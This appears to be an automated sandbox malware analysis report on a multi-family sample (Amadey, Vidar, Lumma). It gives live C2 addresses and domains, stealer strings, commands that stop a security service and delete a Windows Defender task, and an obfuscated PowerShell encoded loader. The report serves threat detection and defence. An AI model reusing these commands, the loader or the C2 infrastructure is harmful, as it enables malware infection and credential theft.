      • Temp0CBUI1MZKVV34WWI1IUD2QTMMB9OTEUU.EXE (PID: 2908)
      • TempFCXNLNJ3UWW6NYT3HLL5MMD7NNFR0VYC.EXE (PID: 9444)
      • Temp0CBUI1MZKVV34WWI1IUD2QTMMB9OTEUU.EXE (PID: 11432)
      • Temp0CBUI1MZKVV34WWI1IUD2QTMMB9OTEUU.EXE (PID: 7664)
      • TempBMAIXTYQTOC5MEWOVBWIYF9JNSMYUGEM.EXE (PID: 13200)
      • Temp0CBUI1MZKVV34WWI1IUD2QTMMB9OTEUU.EXE (PID: 8612)
      • Temp0CBUI1MZKVV34WWI1IUD2QTMMB9OTEUU.EXE (PID: 11508)
      • TempBMAIXTYQTOC5MEWOVBWIYF9JNSMYUGEM.EXE (PID: 11736)
      • TempY7PHAOUMQ1XT4GL7R5GVSY637C4OMAHE.EXE (PID: 10932)
      • TempOJSPJOE1QQ5XOPXFXLCXKCRCBSUBAQMU.EXE (PID: 12144)
      • Temp6P8HZJCHZ5QIJBPPVTYJD9XPAAU0KXJM.EXE (PID: 10224)
      • TempBMAIXTYQTOC5MEWOVBWIYF9JNSMYUGEM.EXE (PID: 6184)
      • TempBMAIXTYQTOC5MEWOVBWIYF9JNSMYUGEM.EXE (PID: 4896)
      • Temp6P8HZJCHZ5QIJBPPVTYJD9XPAAU0KXJM.EXE (PID: 12608)
      • Temp6P8HZJCHZ5QIJBPPVTYJD9XPAAU0KXJM.EXE (PID: 5304)
      • TempBMAIXTYQTOC5MEWOVBWIYF9JNSMYUGEM.EXE (PID: 12108)
      • Temp0CBUI1MZKVV34WWI1IUD2QTMMB9OTEUU.EXE (PID: 12244)
      • TempBMAIXTYQTOC5MEWOVBWIYF9JNSMYUGEM.EXE (PID: 7944)
      • TempBMAIXTYQTOC5MEWOVBWIYF9JNSMYUGEM.EXE (PID: 12292)
      • TempOJSPJOE1QQ5XOPXFXLCXKCRCBSUBAQMU.EXE (PID: 10304)
      • TempBMAIXTYQTOC5MEWOVBWIYF9JNSMYUGEM.EXE (PID: 11904)
      • TempBMAIXTYQTOC5MEWOVBWIYF9JNSMYUGEM.EXE (PID: 5972)
      • Temp6P8HZJCHZ5QIJBPPVTYJD9XPAAU0KXJM.EXE (PID: 12008)
      • TempBMAIXTYQTOC5MEWOVBWIYF9JNSMYUGEM.EXE (PID: 11912)
      • TempBMAIXTYQTOC5MEWOVBWIYF9JNSMYUGEM.EXE (PID: 12680)
      • TempOJSPJOE1QQ5XOPXFXLCXKCRCBSUBAQMU.EXE (PID: 10912)
    • Process checks computer location settings

      • TempDCBPNQU8YYMBBKVUPIDGWKHWW2857ZJZ.EXE (PID: 780)
      • ramez.exe (PID: 7480)
      • f790d43189.tmp (PID: 8184)
    • Creates files or folders in the user directory

      • ramez.exe (PID: 7480)
      • f790d43189.tmp (PID: 8184)
    • Application launched itself

      • firefox.exe (PID: 4208)
      • firefox.exe (PID: 7912)
      • chrome.exe (PID: 7388)
      • chrome.exe (PID: 9116)
      • chrome.exe (PID: 8852)
      • chrome.exe (PID: 8704)
      • chrome.exe (PID: 8860)
      • chrome.exe (PID: 9144)
      • chrome.exe (PID: 8552)
      • chrome.exe (PID: 4844)
      • chrome.exe (PID: 8648)
      • chrome.exe (PID: 8208)
      • chrome.exe (PID: 9352)
      • chrome.exe (PID: 9676)
      • chrome.exe (PID: 9536)
      • chrome.exe (PID: 9844)
      • chrome.exe (PID: 10040)
      • chrmstp.exe (PID: 6808)
      • chrmstp.exe (PID: 8252)
    • Creates a software uninstall entry

      • f790d43189.tmp (PID: 8184)
    • Reads the machine GUID from the registry

      • MSBuild.exe (PID: 1240)
    • Reads the software policy settings

      • MSBuild.exe (PID: 1240)
    • Attempting to use instant messaging service

      • MSBuild.exe (PID: 1240)
    • Creates files in the program directory

      • MSBuild.exe (PID: 1240)
    • Changes the display of characters in the console

      • cmd.exe (PID: 9292)
      • cmd.exe (PID: 8652)
      • cmd.exe (PID: 7308)
    • NirSoft software is detected

      • nircmd.exe (PID: 8468)
    • Starts MODE.COM to configure console settings

      • mode.com (PID: 9940)
    • Checks operating system version

      • cmd.exe (PID: 7308)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Amadey

(PID) Process(7480) ramez.exe
C2185.156.72.96
URLhttp://185.156.72.96/te4h2nus/index.php
Version5.34
Options
Drop directoryd610cf342e
Drop nameramez.exe
Strings (125)lv:
msi
Kaspersky Lab
av:
|
#
"
\App
00000422
dm:
Powershell.exe
ProgramData\
ps1
rundll32
http://
Content-Disposition: form-data; name="data"; filename="
SOFTWARE\Microsoft\Windows NT\CurrentVersion
dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
id:
VideoID
cred.dll|clip.dll|
0000043f
cmd
00000423
SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
-executionpolicy remotesigned -File "
2022
------
2016
og:
\0000
CurrentBuild
2019
:::
S-%lu-
" && timeout 1 && del
ProductName
Panda Security
ESET
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
/k
+++
?scr=1
Doctor Web
GET
SYSTEM\ControlSet001\Services\BasicDisplay\Video
/quiet
.jpg
d610cf342e
vs:
sd:
rundll32.exe
"taskkill /f /im "
pc:
random
=
360TotalSecurity
<d>
wb
Content-Type: multipart/form-data; boundary=----
Startup
Norton
&& Exit"
os:
https://
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
2025
Avira
%-lu
zip
POST
" Content-Type: application/octet-stream
Rem
/te4h2nus/index.php
------
5.34
<c>
clip.dll
AVAST Software
\
shell32.dll
" && ren
e3
ramez.exe
kernel32.dll
DefaultSettings.XResolution
d1
DefaultSettings.YResolution
185.156.72.96
r=
cred.dll
--
GetNativeSystemInfo
-%lu
ComputerName
&unit=
Keyboard Layout\Preload
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
ar:
Sophos
%USERPROFILE%
exe
e1
e2
st=s
Programs
0123456789
un:
rb
bi:
abcdefghijklmnopqrstuvwxyz0123456789-_
SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
cmd /C RMDIR /s/q
Bitdefender
-unicode-
AVG
WinDefender
&&
shutdown -s -t 0
Comodo
00000419
Content-Type: application/x-www-form-urlencoded
/Plugins/
Main

Vidar

(PID) Process(1240) MSBuild.exe
C2https://t.me/eom25h
URLhttps://steamcommunity.com/profiles/76561199855598339
RC43333333333333333UUUUUUUUUUUUUUUU
Strings (1)

Lumma

(PID) Process(7316) MSBuild.exe
C2 (10)emphatakpn.bet/ladk
featurlyin.top/pdal
https://t.me/coscossk
overcovtcg.top/juhd
laminaflbx.shop/twoq
anesthwtcm.run/ladj
posseswsnc.top/akds
testcawepr.run/dsap
saxecocnak.live/manj
blackswmxc.top/bgry
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.4)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:05:15 04:50:32+00:00
ImageFileCharacteristics: Executable, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 14.16
CodeSize: 633856
InitializedDataSize: 326144
UninitializedDataSize: -
EntryPoint: 0x20577
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (British)
CharacterSet: Unicode
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
737
Monitored processes
581
Malicious processes
62
Suspicious processes
47

Behavior graph

Click at the process to see the details
start 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe no specs cmd.exe no specs conhost.exe no specs mshta.exe no specs schtasks.exe no specs powershell.exe conhost.exe no specs sppextcomobj.exe no specs slui.exe 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe cmd.exe no specs mshta.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe conhost.exe no specs tempdcbpnqu8yymbbkvupidgwkhww2857zjz.exe 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe conhost.exe no specs #AMADEY ramez.exe temps6kcu960ngburkrv7ywdbn2svqqei1m0.exe no specs templfox537gdwxhm6afwd7usnzfcnbkgaoh.exe no specs firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs f790d43189.exe f790d43189.tmp info.exe conhost.exe no specs core.exe #VIDAR msbuild.exe werfault.exe no specs ramez.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs d0c70f73cf.exe #LUMMA msbuild.exe chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs werfault.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs csc.exe chrome.exe powershell.exe no specs csc.exe chrome.exe no specs conhost.exe no specs cvtres.exe no specs csc.exe cvtres.exe no specs csc.exe csc.exe chrome.exe no specs chrome.exe chrome.exe no specs cvtres.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs cvtres.exe no specs cvtres.exe no specs chrome.exe no specs csc.exe chrome.exe no specs chrome.exe no specs cvtres.exe no specs csc.exe cvtres.exe no specs csc.exe csc.exe cvtres.exe no specs csc.exe csc.exe cvtres.exe no specs cvtres.exe no specs csc.exe cvtres.exe no specs cvtres.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs #LUMMA 1b02ced825.exe csc.exe cvtres.exe no specs slui.exe csc.exe cvtres.exe no specs 44c5c2a327.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs reg.exe no specs nircmd.exe no specs cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs reg.exe no specs reg.exe no specs nsudolg.exe no specs cmd.exe conhost.exe no specs cmd.exe conhost.exe no specs chcp.com no specs reg.exe no specs reg.exe no specs mode.com no specs cmd.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs tasklist.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs find.exe no specs nsudolg.exe no specs powershell.exe no specs conhost.exe no specs ramez.exe no specs firefox.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs findstr.exe no specs 7z.exe unlocker.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs sc.exe no specs find.exe no specs sc.exe no specs sc.exe no specs unlocker.exe cmd.exe no specs conhost.exe no specs sc.exe no specs iobitunlocker.exe no specs explorer.exe 48c29040fd.exe no specs unregmp2.exe no specs firefox.exe no specs ie4uinit.exe no specs ie4uinit.exe no specs rundll32.exe no specs rundll32.exe no specs taskkill.exe no specs conhost.exe no specs unregmp2.exe no specs searchapp.exe no specs iobitunlocker.exe no specs chrmstp.exe no specs chrmstp.exe no specs chrmstp.exe no specs chrmstp.exe no specs setup.exe no specs setup.exe no specs setup.exe no specs setup.exe no specs setup.exe no specs setup.exe no specs msedge.exe no specs User OOBE Create Elevated Object Server no specs cmd.exe no specs conhost.exe no specs sc.exe no specs sc.exe no specs explorer.exe no specs cmd.exe no specs conhost.exe no specs rundll32.exe no specs taskkill.exe no specs rundll32.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs unlocker.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs sc.exe no specs sc.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs 4f700d268a.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe conhost.exe no specs tempsoe4jajocfahxl0tknlpgiu6hcmexg58.exe no specs settingsynchost.exe no specs werfault.exe no specs searchapp.exe startmenuexperiencehost.exe no specs textinputhost.exe no specs tiworker.exe no specs mobsync.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs schtasks.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs schtasks.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs cmd.exe no specs powershell.exe no specs mshta.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs powershell.exe sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs conhost.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs cmd.exe no specs conhost.exe no specs mshta.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs schtasks.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs schtasks.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs powershell.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs schtasks.exe no specs schtasks.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs cmd.exe no specs mshta.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs mshta.exe no specs mshta.exe no specs mshta.exe no specs cmd.exe no specs cmd.exe no specs mshta.exe no specs mshta.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe powershell.exe no specs powershell.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs powershell.exe no specs schtasks.exe no specs sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs powershell.exe cmd.exe no specs mshta.exe no specs conhost.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs schtasks.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs schtasks.exe no specs schtasks.exe no specs ramez.exe no specs temp0cbui1mzkvv34wwi1iud2qtmmb9oteuu.exe no specs temp6p8hzjchz5qijbppvtyjd9xpaau0kxjm.exe no specs tempfcxnlnj3uww6nyt3hll5mmd7nnfr0vyc.exe no specs temp6p8hzjchz5qijbppvtyjd9xpaau0kxjm.exe no specs temp0cbui1mzkvv34wwi1iud2qtmmb9oteuu.exe no specs tempfcxnlnj3uww6nyt3hll5mmd7nnfr0vyc.exe no specs temp0cbui1mzkvv34wwi1iud2qtmmb9oteuu.exe no specs tempfcxnlnj3uww6nyt3hll5mmd7nnfr0vyc.exe no specs temp0cbui1mzkvv34wwi1iud2qtmmb9oteuu.exe no specs temp0cbui1mzkvv34wwi1iud2qtmmb9oteuu.exe no specs temp0cbui1mzkvv34wwi1iud2qtmmb9oteuu.exe no specs tempbmaixtyqtoc5mewovbwiyf9jnsmyugem.exe no specs temp6p8hzjchz5qijbppvtyjd9xpaau0kxjm.exe no specs tempbmaixtyqtoc5mewovbwiyf9jnsmyugem.exe no specs tempbmaixtyqtoc5mewovbwiyf9jnsmyugem.exe no specs tempojspjoe1qq5xopxfxlcxkcrcbsubaqmu.exe no specs temp6p8hzjchz5qijbppvtyjd9xpaau0kxjm.exe no specs tempbmaixtyqtoc5mewovbwiyf9jnsmyugem.exe no specs tempbmaixtyqtoc5mewovbwiyf9jnsmyugem.exe no specs temp6p8hzjchz5qijbppvtyjd9xpaau0kxjm.exe no specs tempy7phaoumq1xt4gl7r5gvsy637c4omahe.exe no specs temp6p8hzjchz5qijbppvtyjd9xpaau0kxjm.exe no specs tempbmaixtyqtoc5mewovbwiyf9jnsmyugem.exe no specs temp0cbui1mzkvv34wwi1iud2qtmmb9oteuu.exe no specs tempbmaixtyqtoc5mewovbwiyf9jnsmyugem.exe no specs tempbmaixtyqtoc5mewovbwiyf9jnsmyugem.exe no specs tempojspjoe1qq5xopxfxlcxkcrcbsubaqmu.exe no specs tempbmaixtyqtoc5mewovbwiyf9jnsmyugem.exe no specs tempbmaixtyqtoc5mewovbwiyf9jnsmyugem.exe no specs tempbmaixtyqtoc5mewovbwiyf9jnsmyugem.exe no specs tempojspjoe1qq5xopxfxlcxkcrcbsubaqmu.exe no specs #LUMMA svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
140sc stop "MsSecWfp" C:\Windows\System32\sc.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Service Control Manager Configuration Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
208"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=122.0.6261.70 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0x7ffc8734dc40,0x7ffc8734dc4c,0x7ffc8734dc58C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
208"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\0szetbo0.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
208chcp 65001 C:\Windows\System32\chcp.comcmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Change CodePage Utility
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\chcp.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
516"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5100 -childID 4 -isForBrowser -prefsHandle 5084 -prefMapHandle 5092 -prefsLen 31144 -prefMapSize 244583 -jsInitHandle 1524 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c65b3977-81a2-40e9-967b-25c9f436af7e} 4208 "\\.\pipe\gecko-crash-server-pipe.4208" 1f5143bc150 tabC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
632mshta C:\Users\admin\AppData\Local\Temp\cy1r9ecml.htaC:\Windows\SysWOW64\mshta.exeSigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
660schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /fC:\Windows\System32\schtasks.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Task Scheduler Configuration Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
664C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "JABhACAAPQAgADcAMwA4ADgAOwAkAGIAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABhAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAHQAbQBwADUANQA1ADEALgB0AG0AcAAnADsAIAAmACgAIAAkAHMAaABFAGwAbABpAGQAWwAxAF0AKwAkAFMASABFAEwAbABJAEQAWwAxADMAXQArACcAeAAnACkAKAAgAG4ARQB3AC0AbwBCAGoARQBDAFQAIAAgAHMAeQBzAHQARQBtAC4ASQBvAC4AQwBvAG0AUABSAEUAUwBzAEkATwBuAC4ARABFAGYAbABhAFQAZQBzAFQAUgBFAGEATQAoAFsAaQBPAC4AbQBlAE0ATwBSAHkAcwB0AFIARQBhAE0AXQAgAFsAYwBPAG4AdgBFAHIAdABdADoAOgBmAHIAbwBNAEIAQQBTAEUANgA0AHMAdAByAGkAbgBHACgAJwBwAFYAVABSAGIAdABvAHcARgBIADIAdgB4AEQAOQA0AGkASQBkAEUATQBzAGkAagBhAEoAcQBLAEkAcABXAEcAZABxAHYAVQBhAGgAVgAwAFcAegBYAEUAZwAwAGwAdQBTAFQAVABIAGoAaAB5AG4ARABTAHYANwA5ADkAMABrAFoAbwBVAHUARwAwAFYANwBpAGUAKwBOADcAWABQAHUAOQBUAG4AMgBLAEEAeQA3AHQANgBzAFUAUwBQAFUAZAB3ADMAMABzAFkAeABNAHIAUwBVADcAYgByAGEATQA4AGkAKwBXAFMAVABGAGUAWgBnAFcAUgBJAHQAcgBQAGUASgBKAGMAbQBUAHEAQgAzAEsAUQAxAG8AbABVADUAQgBQADgAUQBCAFoATQBQAFcAVQBaAG8AdgBSAEIAeQBRAFEAUABB